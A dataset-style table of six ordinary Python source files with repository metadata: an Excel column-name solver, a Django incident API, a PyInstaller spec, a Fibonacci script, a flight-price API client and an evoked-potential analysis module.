blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
85d04338d64d7d444e83215d37536e20f9f2f2fb | b3b6f9edbcf7361d45b1b53853c05a281ad46a67 | /Companies Question/27 Excel Sheet Part - 1.py | d2e9b47b3e8832421527c85d6b8dc351aaa96128 | [] | no_license | nishantchauhan00/GeeksForGeeks | 7006e1fc19ca6e8f3b18c8abd3634ae9c78423ce | a0971e8e97b979f6843b433354a3e851559239dd | refs/heads/master | 2022-12-16T13:15:15.761935 | 2020-09-21T23:51:21 | 2020-09-21T23:51:21 | 297,486,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | def solver(n):
out = ""
while n > 0:
x = n % 26
if x is not 0:
out += chr(x + 64)
n = int(n/26)
else: # if x is 0:
out += 'Z'
n = int(n/26) - 1
return out[::-1]
# Read the number of queries, then emit one Excel column name per line.
T = int(input())
for _ in range(T):
    print(solver(int(input())))
'''
https://www.geeksforgeeks.org/find-excel-column-name-given-number/
> Suppose we have a number n, let’s say 28. so corresponding to it we need to print
the column name. We need to take remainder with 26.
> If remainder with 26 comes out to be 0 (meaning 26, 52 and so on) then we put ‘Z’
in the output string and new n becomes n/26 -1 because here we are considering 26
to be ‘Z’ while in actual it’s 25th with respect to ‘A’.
Similarly if the remainder comes out to be non zero. (like 1, 2, 3 and so on) then
we need to just insert the char accordingly in the string and do n = n/26.
Finally we reverse the string and print.
'''
| [
"nishantchauhanbvcoe@gmail.com"
] | nishantchauhanbvcoe@gmail.com |
faf8c8fe8ef760c255a1876d743f8888cd3c3979 | 700b632791b4a9edb66b11de899b2d2c9ce0849c | /src/incidencias/api.py | 92883cd3f70f344b3ac00969b08aa188853d7c0b | [] | no_license | pablomt/Ejercicio-Backend-Incidencias | 4c78249a53a8d1b72be818201c59c9b8ea0bd2d0 | 4a19df90877c38005106806616cda174fba31e1c | refs/heads/master | 2021-07-08T02:07:53.181664 | 2017-10-02T15:02:50 | 2017-10-02T15:02:50 | 105,333,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,145 | py | # coding=utf-8
# Librerías extras de Django requeridas para la manipulación de la información.
from django.db.models import QuerySet
from django.views.generic.list import ListView
from django.http.response import HttpResponse
from django.db.models import Q
from django.db.models.aggregates import Sum, Count
from datetime import date, timedelta
# Este import se utilizara en la api para forzar al usuario a estar logeado para consumir las apis.
from django.contrib.auth.mixins import LoginRequiredMixin
# Imports provenientes del modelo de compromisos.
from incidencias.models import Catalogo, Area, Item, Incidencia
# Utilidades propias a utilizar dentro del API.
from sistemaIncidencias.utilities.utilities import Utilities
from incidencias.buscador import Buscador
'''
Funciones definidas fuera de una estructura de clase, para ser consumida por las clases y otras funciones
declaradas en este script.
'''
def get_array_or_none(the_string):
    '''
    Convert a comma-separated string of integers into a list of ints.

    Returns None when the string is None *or* empty. The previous version only
    checked for None, so an empty string crashed on ``int('')``; the truthiness
    check now matches the documented contract.

    :param the_string: comma-separated values, e.g. ``"1,2,3"``.
    :return: list of ints, or None.
    '''
    if not the_string:
        return None
    return [int(chunk) for chunk in the_string.split(',')]
def get_incidencias_por_catalogo_area(incidencias_set=None, areas_array=None):
    '''
    Build a dashboard-style report of incident counts grouped by catalog and
    by area, with this structure::

        [{id_catalogo, nombre_catalogo, areas: [{id_area, nombre_area,
          num_incidencias}], num_insidencias_por_catalogo}]

    :param incidencias_set: optional pre-filtered Incidencia queryset; when
        None, all incidents are counted.
    :param areas_array: optional list of Area ids to restrict the report to.
    '''
    reporte = []
    # NOTE(review): the catalog id is hard-coded to 2 — presumably the one
    # catalog this report is meant for; confirm against the data model.
    catalogo_set = Catalogo.objects.filter(id=2).order_by('id')
    if areas_array is None:
        areas_set = Area.objects.all().order_by('id')
    else:
        areas_set = Area.objects.filter(Q(id__in=areas_array))
    for catalogo in catalogo_set:
        # Per-catalog record; keys (including the misspelled
        # "num_insidencias_por_catalogo") are part of the JSON contract.
        registro = {
            "id_catalogo": catalogo.id,
            "nombre_catalogo": catalogo.nombre,
            "areas": [],
            "num_insidencias_por_catalogo": 0
        }
        for area in areas_set:
            # Narrow the incidents to this catalog/area pair.
            if incidencias_set is None:
                incidencias_filtradas = Incidencia.objects.filter(Q(item__area__catalogo__id=catalogo.id),
                                                                  Q(item__area__id=area.id))
            else:
                incidencias_filtradas = incidencias_set.filter(Q(item__area__catalogo__id=catalogo.id),
                                                               Q(item__area__id=area.id))
            # Group by area and count; yields at most one row per area here
            # because the filter above already pinned the area.
            incidencias_set_areas = incidencias_filtradas.values('item__area__catalogo__id',
                                                                 'item__area__catalogo__nombre',
                                                                 'item__area__id').annotate(
                num_incidencias=Count('item__area'))
            registro_area = {
                "id_area": area.id,
                "nombre_area": area.nombre,
                "num_incidencias": 0,
            }
            for incidencias in incidencias_set_areas:
                registro_area['num_incidencias'] = incidencias['num_incidencias']
                registro["num_insidencias_por_catalogo"] = registro["num_insidencias_por_catalogo"] + incidencias[
                    'num_incidencias']
            registro['areas'].append(registro_area)
        reporte.append(registro)
    # NOTE(review): leftover debug print on every call — consider removing.
    print(reporte)
    return reporte
'''
Definición de los endpoints tipo REST.
'''
# Endpoint that serialises every row of a given model as JSON.
# URL: /incidencias/api/"modelo"
class ModelosEndpoint(LoginRequiredMixin, ListView):
    """Return all instances of *modelo*, ordered by name, as a JSON payload."""

    def get(self, request, modelo):
        queryset = modelo.objects.all().order_by('nombre')
        payload = Utilities.query_set_to_dumps(queryset)
        return HttpResponse(payload, 'application/json')
# Endpoint returning every Area that belongs to one Catalogo.
# URL: /incidencias/api/get-areas-por-catalogo?catalogo_id=1
class AreasPorCategoriaEndpoint(LoginRequiredMixin, ListView):
    """List the areas of the catalog given by the ``catalogo_id`` query parameter."""

    def get(self, request, **kwargs):
        catalogo = request.GET.get('catalogo_id')
        areas = Area.objects.filter(catalogo=catalogo).order_by('nombre')
        # Ids are serialised as strings to keep the existing JSON contract.
        respuesta = [
            {
                "area_id": str(area.id),
                "area_nombre": area.nombre,
                "catalogo_id": str(area.catalogo.id),
                "catalogo_nombre": area.catalogo.nombre,
            }
            for area in areas
        ]
        # Removed the leftover `print(respuesta)` debug statement that wrote
        # the full payload to stdout on every request.
        return HttpResponse(Utilities.json_to_dumps(respuesta), 'application/json')
# Endpoint returning every Item that belongs to one Area.
# URL: incidencias/api/get-items-por-area?area_id=1
class ItemsPorAreaEndpoint(LoginRequiredMixin, ListView):
    """Serialise the items of the area given by the ``area_id`` query parameter."""

    def get(self, request, **kwargs):
        area_id = request.GET.get('area_id')
        queryset = Item.objects.filter(area__id=area_id)
        return HttpResponse(Utilities.query_set_to_dumps(queryset), 'application/json')
class BuscadorIncidencias(LoginRequiredMixin, ListView):
    """Search incidents using the query-string filters and return a per-area report."""

    def get(self, request, **kwargs):
        params = request.GET
        areas = get_array_or_none(params.get('areas'))
        buscador = Buscador(
            catalogos=get_array_or_none(params.get('catalogos')),
            areas=areas,
            items=get_array_or_none(params.get('items')),
            # Range-style parameters (creation-date window).
            rango_de_fecha_creacion_desde=params.get('rango_de_fecha_creacion_desde'),
            rango_de_fecha_creacion_hasta=params.get('rango_de_fecha_creacion_hasta'),
        )
        incidencias = buscador.buscar()
        # Report 1: incidents grouped by catalog and area.
        # NOTE(review): "indicencias" is misspelled but is part of the public
        # JSON contract, so the key is reproduced verbatim.
        payload = {
            "indicencias_por_area": get_incidencias_por_catalogo_area(incidencias, areas),
        }
        return HttpResponse(Utilities.json_to_dumps(payload), 'application/json; charset=utf-8')
| [
"pmoretepi@gmail.com"
] | pmoretepi@gmail.com |
f9bd3ed65fdfbde836edc6b63ca43bbde1280abe | 0ec65a65935e877dec4fe97ff9b9422eee1b0d74 | /更新excel数据_泡菜数据腌制.spec | 17e73a00b9af586783bf0e00a5d973ceab2b4999 | [] | no_license | kuifye/-python- | 48f438a9a5bac340175212810e2e8a7c89b6e5ec | 26c2d2793901c611c498fe475d0e7af67e71de46 | refs/heads/master | 2022-11-02T21:45:19.345657 | 2022-10-18T12:30:00 | 2022-10-18T12:30:00 | 266,112,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | spec | # -*- mode: python ; coding: utf-8 -*-
# PyInstaller build spec (generated file): bundle the script below into a
# single self-contained console executable.

# No bytecode encryption.
block_cipher = None

# Collect the script, its binaries and pure-Python modules.
a = Analysis(['更新excel数据_泡菜数据腌制.py'],
             pathex=['D:\\资料\\程序\\python\\heathstone\\hearthstone'],
             binaries=[],
             datas=[],
             hiddenimports=[],
             hookspath=[],
             runtime_hooks=[],
             excludes=[],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher,
             noarchive=False)
# Archive of the pure-Python modules.
pyz = PYZ(a.pure, a.zipped_data,
          cipher=block_cipher)
# One-file executable (runtime_tmpdir=None) with a visible console window.
exe = EXE(pyz,
          a.scripts,
          a.binaries,
          a.zipfiles,
          a.datas,
          [],
          name='更新excel数据_泡菜数据腌制',
          debug=False,
          bootloader_ignore_signals=False,
          strip=False,
          upx=True,
          upx_exclude=[],
          runtime_tmpdir=None,
          console=True )
| [
"noreply@github.com"
] | noreply@github.com |
1c93b3cc18e5fdea86e84540ef2d5a8c8add5445 | 2307605c5c23581069b0ac919924adc16dba3bd2 | /mathCalc/printN_fibanocci_Number.py | 3fc5f383a390ea3d55baf49d973d7a14e3ea237e | [] | no_license | kshitijyadav1/Python_Programming_Stuff | c2bf0c81e09065452c8a7af658303c0abe751563 | 15b476a498e1a1cb3fb4dfa9c651d053a0f2a90f | refs/heads/master | 2020-08-04T08:36:35.409140 | 2019-10-21T03:28:02 | 2019-10-21T03:28:02 | 212,075,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | #! python3
# find fibanocci number from the series init and to where the series end.
import sys
from_ = 0
to_ = 0
try:
    # sys.argv values are strings; the original passed the raw string on to
    # range() in n_Fibanocci_series, which raised TypeError. Convert here.
    # NOTE(review): index 2 means the count is the *second* CLI argument —
    # confirm that is intended (argv[1] is the first argument).
    to_ = int(sys.argv[2])
except (IndexError, ValueError):
    # Fall back to interactive input when the argument is missing or not a
    # number (the original bare `except:` also swallowed KeyboardInterrupt).
    to_ = int(input("Enter the fibanocci series range: "))
def n_Fibanocci_series(end):
    """Print the first *end* Fibonacci numbers with 1-based labels, then a rule."""
    previous, current = 0, 1
    for index in range(end):
        print((index + 1), " fibonacci number ", previous)
        previous, current = current, previous + current
    print("=" * 31)
n_Fibanocci_series(to_)
| [
"kshitijyadav147258@gmail.com"
] | kshitijyadav147258@gmail.com |
9ad82cda5743375f3dcf03cb7bb97819ab9ff685 | 0e4fe0e4ac4cc49e60b1aee752f7aabf17f905f0 | /producer/api_caller.py | d9224e9a88dff9f74581362f3679a843c8bcb186 | [
"MIT"
] | permissive | igorgorbenko/aviasales_kinesis | 2c77afa0a47d6a580a00a571d0ab88c45a502036 | 46c099e0f8a96e85244954a6dca1aab81405b91f | refs/heads/master | 2021-03-23T03:46:55.265449 | 2020-04-27T07:40:01 | 2020-04-27T07:40:01 | 247,420,021 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,718 | py | #!/usr/bin/python3
"""Example Code of API calling to receive the prices of the tickets."""
import asyncio
import csv
import json
import logging
import sys
import time
import uuid
from urllib.error import HTTPError

from aiohttp import ClientResponseError, ClientSession, FormData
# Output CSV path; the timestamp is resolved once, at import time.
TARGET_FILE = time.strftime(r'/var/log/airline_tickets/%Y%m%d-%H%M%S.log')
# Travelpayouts "month matrix" prices endpoint and its fixed query values.
BASE_URL = 'http://api.travelpayouts.com/v2/prices/month-matrix'
CURRENCY = 'rub'
ORIGIN = 'LED'
DESTINATION = 'KZN'
SHOW_TO_AFFILIATES = 'false'
TRIP_DURATION = '1'

# Configure a stdout logger exactly once; the handler guard prevents
# duplicate handlers when the module is imported repeatedly.
LOGGER = logging.getLogger('StatsCreator')
if not LOGGER.handlers:
    LOGGER.setLevel(logging.INFO)
    FORMATTER = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s',
                                  '%Y-%m-%d %H:%M:%S')
    CONSOLE_HANDLER = logging.StreamHandler(sys.stdout)
    CONSOLE_HANDLER.setFormatter(FORMATTER)
    LOGGER.addHandler(CONSOLE_HANDLER)
class TicketsApi:
    """Thin async client for the Travelpayouts prices endpoint."""

    def __init__(self, headers):
        """Store the request *headers*; the URL comes from module-level BASE_URL."""
        self.base_url = BASE_URL
        self.headers = headers

    async def get_data(self, data):
        """GET the endpoint with *data* and return the decoded JSON body.

        Returns an empty dict on any failure; errors are logged rather than
        raised so a scheduled run never crashes.
        """
        response_json = {}
        async with ClientSession(headers=self.headers) as session:
            try:
                response = await session.get(self.base_url, data=data)
                # Fixed: raise_for_status() raises aiohttp.ClientResponseError,
                # not urllib's HTTPError — the original `except HTTPError`
                # branch could never fire, so HTTP errors fell through to the
                # generic handler with a misleading message.
                response.raise_for_status()
                LOGGER.info('Response status %s: %s',
                            self.base_url, response.status)
                response_json = await response.json()
            except ClientResponseError as http_err:
                LOGGER.error('Oops! HTTP error occurred: %s', str(http_err))
            except Exception as err:
                LOGGER.error('Oops! An error occurred: %s', str(err))
        return response_json
def get_guid():
    """Return a freshly generated random UUID4 as a string."""
    return "{}".format(uuid.uuid4())
def log_maker(response_json):
    """Save the response into a csv file.

    Writes one CSV row per entry of ``response_json['data']`` — the entry's
    values in dict order plus a trailing random GUID column — to TARGET_FILE,
    and returns the number of rows written.
    """
    # NOTE(review): csv.writer over a file opened without newline='' can emit
    # extra blank lines on Windows — confirm the target platform.
    with open(TARGET_FILE, 'w+') as csv_file:
        csv_writer = csv.writer(csv_file)
        count = 0
        new_row = []
        for resp in response_json['data']:
            # Assumes each entry is a dict — TODO confirm against the API schema.
            new_row = list(resp.values())
            new_row.append(get_guid())
            csv_writer.writerow(new_row)
            count += 1
    return count
def prepare_request(api_token):
    """Build the auth headers and the form payload for the API request."""
    headers = {'X-Access-Token': api_token,
               'Accept-Encoding': 'gzip'}
    data = FormData()
    # Field order matches the original call sequence.
    for field, value in (('currency', CURRENCY),
                         ('origin', ORIGIN),
                         ('destination', DESTINATION),
                         ('show_to_affiliates', SHOW_TO_AFFILIATES),
                         ('trip_duration', TRIP_DURATION)):
        data.add_field(field, value)
    return headers, data
async def main():
    """Entry point: validate CLI args, query the API, and persist the rows."""
    if len(sys.argv) != 2:
        print('Usage: api_caller.py <your_api_token>')
        sys.exit(1)
        # NOTE(review): unreachable — sys.exit raises before this return.
        return
    api_token = sys.argv[1]
    headers, data = prepare_request(api_token)
    api = TicketsApi(headers)
    response = await api.get_data(data)
    # print(json.dumps(response, indent=4))
    # The API signals success via a boolean 'success' field.
    if response.get('success', None):
        LOGGER.info('API has returned %s items', len(response['data']))
        try:
            count_rows = log_maker(response)
            LOGGER.info('%s rows have been saved into %s',
                        count_rows,
                        TARGET_FILE)
        except Exception as e:
            # File-system problems shouldn't kill the run; log and move on.
            LOGGER.error('Oops! Request result was not saved to file. %s',
                         str(e))
    else:
        LOGGER.error('Oops! API request was unsuccessful %s!', response)
if __name__ == '__main__':
    # NOTE(review): get_event_loop()/run_until_complete is the legacy idiom;
    # asyncio.run(main()) is the modern equivalent on Python 3.7+ — confirm
    # the deployment interpreter before switching.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
| [
"igor_gorbenko@list.ru"
] | igor_gorbenko@list.ru |
1583d364dfcf8b3a6940cd3fdd51c257ddb2337f | 6ab2fc04b77315072d202d31fa39357c2a8dbffd | /neuralpanda/analyser/aEvokedPotential.py | 6903c1327b9475dad38b3de3ae2b2cd0b3dfe36c | [] | no_license | kupo9/neuralpanda | b1e84dba826dbc8895ff7389a9af1e5ffa8820fd | 8814703925016e3c10d1ebed65763eb02ff4950b | refs/heads/master | 2020-03-26T16:38:06.094784 | 2018-08-17T11:51:16 | 2018-08-17T11:51:16 | 145,112,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,387 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 14:19:31 2015
@author: Pomesh
EvokedPotential methods for analysis. For now, the matplotlib code is here.
It'll need to be moved later.
Adding write to excel and txt file, use self.currPlot to get the index to the
current plot. Rename this in the code, A1, C1 are max, min labels
Write to A2, C2
"""
from __future__ import division
import itertools
import numpy as np
from scipy import signal
#from .. import pEvokedPotential as pe
from scipy.signal import butter, filtfilt, lfilter, argrelextrema
from scipy.fftpack import fft
import matplotlib.pyplot as plt
import peakdetect as peakdect
import xlwings as xw
class aEvokedPotential():
    def __init__(self, figure, segment, _type, *pEvokedPotential):
        """Analyse each evoked-potential source and render it into *figure*.

        :param figure: matplotlib figure whose axes are filled, one per source.
        :param segment: 0-based segment index; used in the stats file name.
        :param _type: "ep" (evoked potential) or "fp" (field potential);
            any other value leaves self.infFile unset and does nothing.
        :param pEvokedPotential: one source object per axes; each must expose
            .name, be closeable, and (presumably) the pEvokedPotential API —
            TODO confirm the expected interface.
        """
        #self.evp = pEvokedPotential
        self.fig = figure
        # One stats file per segment; opened for the whole run and closed below.
        if _type == "ep":
            self.infFile = open("empty_statsFile_ep" + str(segment+1) + ".txt", 'w')
        if _type == "fp":
            self.infFile = open("empty_statsFile_fp" + str(segment+1) + ".txt", 'w')
        for i in pEvokedPotential:
            # figure.axes[pEvokedPotential.index(i)].get_xaxis().set_visible(False)
            # figure.axes[pEvokedPotential.index(i)].get_yaxis().set_visible(False)
            if _type == "ep":
                self.evp = i
                print("\nNew Axes: " + str(self.evp.name))
                #plt.figure()
                # Strip tick labels; the axes index doubles as the Excel sheet index.
                figure.axes[pEvokedPotential.index(i)].set_xticklabels([])
                figure.axes[pEvokedPotential.index(i)].set_yticklabels([])
                self.currPlot = pEvokedPotential.index(i)
                # One Excel sheet per source, headed by Maxima/Minima columns.
                xw.Sheet.add()
                xw.Sheet(self.currPlot+1).activate()
                xw.Sheet(self.currPlot+1).name = str(self.evp.name)
                xw.Range('A1').value = 'Maxima'
                xw.Range('D1').value = 'Minima'
                self._draw()
                i.close()
            if _type == "fp":
                self.evp = i
                print("FP")
                figure.axes[pEvokedPotential.index(i)].set_xticklabels([])
                figure.axes[pEvokedPotential.index(i)].set_yticklabels([])
                self.currPlot = pEvokedPotential.index(i)
                xw.Sheet.add()
                xw.Sheet(self.currPlot+1).activate()
                xw.Sheet(self.currPlot+1).name = str(self.evp.name)
                xw.Range('A1').value = 'Maxima'
                xw.Range('D1').value = 'Minima'
                self.drawDiffMeasures()
                i.close()
        if _type == "ep":
            self.infFile.close()
        if _type == "fp":
            self.infFile.close()
    def drawDiffMeasures(self):
        """Plot the z-scored differential signal for the current source and
        export its detected extrema to the active Excel sheet.

        Python 2 print statements throughout; `1/16` is true division thanks
        to the module's `from __future__ import division`.
        """
        print("Drawing DiffMeasures")
        #self.fig.axes[0].legend(loc="upper right", fontsize=12)
        d = self.evp._getDiff()
        print "dshape" + str(d.shape)
        # Normalise by the baseline std (samples 2000:4870 — presumably the
        # pre-stimulus window; confirm against the acquisition protocol).
        stdBase = np.std(d[2000:4870])
        # Light 3-point moving-average smoothing before peak detection.
        data = signal.filtfilt(np.ones(3)/3, 1, np.divide(d, stdBase))
        maxv, minv = peakdect.peakdet(data[4850:], delta=3)
        print "data shape" + str(data.shape)
        # Drop the first maximum (presumably the stimulus artefact — confirm).
        maxv = maxv[1:]
        self.infFile.write("\n+++\n")
        self.infFile.write(self.evp.name)
        self.maxList = []
        self.minList = []
        print "maxv" + str(maxv)
        print "minv" + str(minv)
        try:
            # Mark extrema on the plot; +4870 maps peak indices (relative to
            # the detection window) back to absolute sample positions.
            self.fig.axes[self.currPlot].plot(maxv[:,0]+4870, maxv[:,1], 'o', color = 'red')
            self.fig.axes[self.currPlot].plot(minv[:,0]+4870, minv[:,1], 'x', color = 'green')
            self.writeToStatsFile(maxv, minv)
        except (IndexError) as e:
            # No extrema detected: empty arrays cannot be column-indexed.
            print "----Empty"
        self.maxList = np.asarray(self.maxList)
        print self.maxList
        # Excel rows start at 2 (row 1 holds the Maxima/Minima headers).
        _curr = 2
        try:
            for i in range(0, len(self.maxList)):
                #print "Curr: " + str(_curr)
                _size = self.maxList[i].size
                #print self.maxList[i][:,0]
                # Convert sample index to time units (1/16 per sample —
                # presumably ms at a 16 kHz-derived rate; confirm).
                self.maxList[i][:,0] = np.multiply(self.maxList[i][:,0], (1/16))
                print self.maxList[i]
                xw.Range('A'+str(_curr)).value = self.maxList[i]
                xw.Range('A'+str(_curr)).color = (255,50,78)
                _curr += _size
        except (ValueError, IndexError) as e:
            print "Something Went Wrong, Dont ask me what"
        _curr = 2
        try:
            for i in range(0, len(self.minList)):
                #print "Curr: " + str(_curr)
                _size = self.minList[i].size
                #print self.minList[i]
                self.minList[i][:,0] = np.multiply(self.minList[i][:,0], (1/16))
                xw.Range('D'+str(_curr)).value = self.minList[i]
                xw.Range('D'+str(_curr)).color = (102,205,170)
                _curr += _size
        except (ValueError, IndexError) as e:
            print "Something Went Wrong "
        # try:
        #     self.infFile.write("\nMaxList\n")
        #     _j = np.nanmean(self.maxList, axis= 0)
        #     _j[:,0] = (_j[:,0] + 4700)*(1/16)
        #     self.infFile.write(str(_j))
        #
        #     self.infFile.write("\nMinList\n")
        #     _g = np.nanmean(self.minList, axis= 0)
        #     _g[:,0] = (_g[:,0] + 4700)*(1/16)
        #     self.infFile.write(str(_g))
        #
        # except (ValueError, IndexError) as e:
        #     print "Value Error on: " + str(self.evp.name)
        #
        # #self.fig.axes[0].set_ylim([0, 5])
        print ("Plot Diff\n")
        #self.drawAll()
        self.fig.axes[self.currPlot].set_title(self.evp.name, loc="left", fontsize=12)
        self.fig.axes[self.currPlot].set_ylim([-10, 280])
        #self.fig.axes[self.currPlot].set_ylabel('FP', fontsize=5)
        self.fig.axes[self.currPlot].plot(data, label = self.evp.name, linewidth=1.0)
        # Free the large intermediate arrays before processing the next source.
        del d, data
    def _draw(self):
        """Run the per-channel EP analysis (via drawAll), then export the
        collected extrema to Excel and append summary stats to the stats file.
        """
        #writing name to statsfile
        self.infFile.write("\n\n++++++++++++++++++++++++++++++\n")
        self.infFile.write(self.evp.name)
        # Reset the per-source accumulators filled by writeToStatsFile().
        self.maxList = []
        self.minList = []
        self.drawAll()
        print len(self.maxList)
        # Excel rows start at 2 (row 1 holds the Maxima/Minima headers).
        _curr = 2
        try:
            for i in range(0, len(self.maxList)):
                #print "Curr: " + str(_curr)
                _size = self.maxList[i].size
                #print self.maxList[i][:,0]
                # Convert sample index to time units (1/16 per sample — confirm rate).
                self.maxList[i][:,0] = np.multiply(self.maxList[i][:,0], (1/16))
                print self.maxList[i]
                xw.Range('A'+str(_curr)).value = self.maxList[i]
                xw.Range('A'+str(_curr)).color = (255,50,78)
                _curr += _size
        except IndexError as e:
            print "Something Went Wrong "
        _curr = 2
        try:
            for i in range(0, len(self.minList)):
                #print "Curr: " + str(_curr)
                _size = self.minList[i].size
                #print self.minList[i]
                self.minList[i][:,0] = np.multiply(self.minList[i][:,0], (1/16))
                xw.Range('D'+str(_curr)).value = self.minList[i]
                xw.Range('D'+str(_curr)).color = (102,205,170)
                _curr += _size
        except IndexError as e:
            print "Something Went Wrong "
        self.maxList = np.asarray(self.maxList)
        self.minList = np.asarray(self.minList)
        try:
            # Average extrema across channels; +5000 undoes the detection-window
            # offset before converting to time units.
            self.infFile.write("\nMaxList\n")
            _j = np.nanmean(self.maxList, axis= 0)
            _j[:,0] = (_j[:,0] + 5000)*(1/16)
            self.infFile.write(str(_j))
            self.infFile.write("\nMinList\n")
            _g = np.nanmean(self.minList, axis= 0)
            _g[:,0] = (_g[:,0] + 5000)*(1/16)
            self.infFile.write(str(_g))
        except (ValueError, IndexError) as e:
            # Ragged per-channel arrays make nanmean/column indexing fail.
            print "Value Error on: " + str(self.evp.name)
        #
        # plt.title("EP: " + self.evp.info + " Segment: " + str(self.evp._seg + 1) + "MCS_" + str(self.evp._mainStimChannel))
        # plt.legend(loc= "upper right")
        # plt.ylim([-5000, 5000])
        _val = plt.xticks()
        # NOTE(review): bare attribute access — a no-op; probably meant to be a
        # plt.xscale(...) call or removed entirely.
        plt.xscale
        #plt.savefig("images/" +self.evp.info + "MCS_" + str(self.evp._mainStimChannel) + "_segment_" + str(self.evp._seg + 1) + ".png")
    def _plotEvokedPotential(self, a):
        """Average, smooth and plot channel *a*'s evoked potential, recording
        detected extrema via writeToStatsFile().
        """
        #ask about these
        # Trial-average the channel's sweeps (axis 0 = trials — confirm).
        data = np.mean(self.evp.getCSC_e(a), axis = 0)
        # 50-point moving-average smoothing before peak detection.
        d = signal.filtfilt(np.ones(50)/50, 1, data)
        #print "dshape" + str(d.shape)
        #_test = signal.filtfilt(np.ones(50)/50, 1, data[5000:])
        maxv, minv = peakdect.peakdet(d[2650:], delta=250)
        # Drop the first maximum (presumably the stimulus artefact — confirm).
        maxv = maxv[1:]
        #minv = minv[1:]
        try:
            # +2700 maps window-relative indices back to absolute samples.
            #self.fig.axes[self.currPlot].plot(maxv[:,0]+2700, maxv[:,1], 'o', color = 'red')
            self.fig.axes[self.currPlot].plot(minv[:,0]+2700, minv[:,1], 'o', color = 'green')
            self.writeToStatsFile(maxv, minv)
        except (IndexError) as e:
            # No extrema detected: empty arrays cannot be column-indexed.
            print "----Empty"
        # for i in range(0, len(_alt)):
        #     plt.plot(_alt[i] + 5000, _test[_alt][i], 'o', color = 'red')
        #
        print("Plotting EPs")
        twix = self.fig.axes[self.currPlot]
        twix.set_ylim([-3000, 5000])
        twix.set_yticklabels([])
        twix.set_title(self.evp.name, loc="left", fontsize=12)
        twix.plot(d, label = "Channel : " + str(a), linewidth=0.4)
        # for i in range(0, len(maxi[0])):
        #     self.fig.axes[self.currPlot].plot(maxi[0][i]+5000, d[5000:7000][maxi][i], 'o', color='gray')
        #
        # for i in range(0, len(mini[0])):
        #     self.fig.axes[self.currPlot].plot(mini[0][i]+5000, d[5000:7000][mini][i], 'x', color = 'red')
        # Free the large intermediate arrays before the next channel.
        del d, data
def drawAll(self):
self.f = list(itertools.combinations(self.evp._cscArray,2))
g = self.f[ :len(self.evp._cscArray)-1]
#self.evp.getSubSignals(g)
for i in self.evp._cscArray:
self._plotEvokedPotential(i)
def writeToStatsFile(self, maxv, minv):
#maxAvg = np.average(maxv, axis=0)
#minAvg = np.average(minv, axis=0)
self.infFile.write("\n")
self.infFile.write("\nmax values")
self.infFile.write(str(maxv))
self.infFile.write("\nmin values")
self.infFile.write(str(minv))
#self.infFile.write("\nMax Avg: " + str(maxAvg))
#self.infFile.write("\nMin Avg: " + str(minAvg))
self.infFile.write("\n")
self.maxList.append(maxv)
self.minList.append(minv)
def butter_bandpass(self, lowcut, highcut, fs, order=2):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = butter(order, [low, high], btype='stop')
return b, a
# def _drawAll(self):
# #what to index here?
# [self._calcAndDraw(x) for x in self.evp.getAll()]
""" Old file, for checking purposes"""
## -*- coding: utf-8 -*-
#"""
#Created on Tue Nov 17 14:19:31 2015
#
#@author: Pomesh
#
#EvokedPotential methods for analysis. For now, the matplotlib code is here.
#It'll need to be moved later.
#
#TODO: Refactor to separate class for handling the drawing.
#This class should only be for analysis. Should return an array of µv values
#that are plotted with pandaplot.
#
#"""
#from __future__ import division
#
#import itertools
#import numpy as np
##from .. import pEvokedPotential as pe
#
#import matplotlib.pyplot as plt
#from matplotlib.ticker import FormatStrFormatter
#from scipy import signal
#
#class aEvokedPotential():
#
# def __init__(self, *pEvokedPotential):
# #self.evp = pEvokedPotential
# fig = plt.figure()
#
# for i in pEvokedPotential:
# self.evp = i
# self._draw()
# plt.close()
#
# def createSubplots(self, i ):
# pass
#
# def _draw(self):
# self._drawAll()
## plt.title("EP: " + self.evp.info + " Segment: " + str(self.evp._seg + 1) +
## "MCS_" + str(self.evp._mainStimChannel))
# plt.legend(loc= "lower right")
# ax = plt.axes()
# tks=ax.get_xticks()
# ax.set_xticklabels(np.round(np.multiply(tks,(1/1017))-0.3, 1))
# #ax.xaxis.set_major_formatter(FormatStrFormatter('%0.2f'))
# plt.ylim([-1000, 1000])
# plt.savefig("images/" +self.evp.info + "MCS_" + str(self.evp._mainStimChannel) +
# "_segment_" + str(self.evp._seg + 1) + ".png", dpi = 300)
# #print np.multiply(tks, (1/1017))
# del tks, ax
#
# def _drawAll(self):
# f = list(itertools.combinations(self.evp._cscArray,2))
# g = f[ :len(self.evp._cscArray)-1]
# #self.evp.getSubSignals(g)
# for i in self.evp._cscArray:
# self._calcAndDraw(i)
#
# def _calcAndDraw(self, a):
# #ask about these
# self.calulatedEp = self.evp.getEvokedPotential(a, 3)
## print "length ep: " + str(n+1) + str(len(self.calulatedEp)) +"\n"
# plt.plot(self.calulatedEp, label = "Channel : " + str(a), linewidth=0.3)
# return self.calulatedEp | [
"kupo9.tmp@gmail.com"
] | kupo9.tmp@gmail.com |
